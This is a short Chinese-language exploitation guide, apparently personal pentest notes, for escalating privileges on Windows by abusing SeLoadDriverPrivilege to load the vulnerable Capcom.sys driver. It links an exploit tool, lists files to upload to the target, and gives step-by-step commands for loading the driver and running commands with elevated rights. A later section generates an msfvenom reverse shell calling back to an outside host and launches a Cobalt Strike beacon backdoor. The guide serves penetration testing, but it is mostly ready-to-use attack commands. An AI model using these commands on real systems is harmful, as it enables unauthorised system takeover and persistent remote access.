SeLoadDriverPrivilege

1. 漏洞利用工具下载:

https://github.com/k4sth4/SeLoadDriverPrivilege

2. 利用教程:

2.1. 上传驱动文件和工具

将以下文件上传到目标机器的一个可写目录中:

  • eoploaddriver_x64.exe
  • Capcom.sys
  • ExploitCapcom.exe
    Pasted image 20241204220541.png

2.2. 启用 SeLoadDriverPrivilege 权限

如果权限启用了 可以忽略
由于默认情况下 SeLoadDriverPrivilege 是禁用的,需要首先启用该权限

.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys

2.3. 通过 ExploitCapcom.exe 加载驱动

.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys

Pasted image 20241204220714.png

2.4. 特权用户执行命令

.\ExploitCapcom.exe EXPLOIT whoami

Pasted image 20241204220753.png

3. 更多利用

3.1. msf回弹shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f exe > shell.exe

.\ExploitCapcom.exe EXPLOIT shell.exe

3.2. CS后门

.\ExploitCapcom.exe EXPLOIT beacon.exe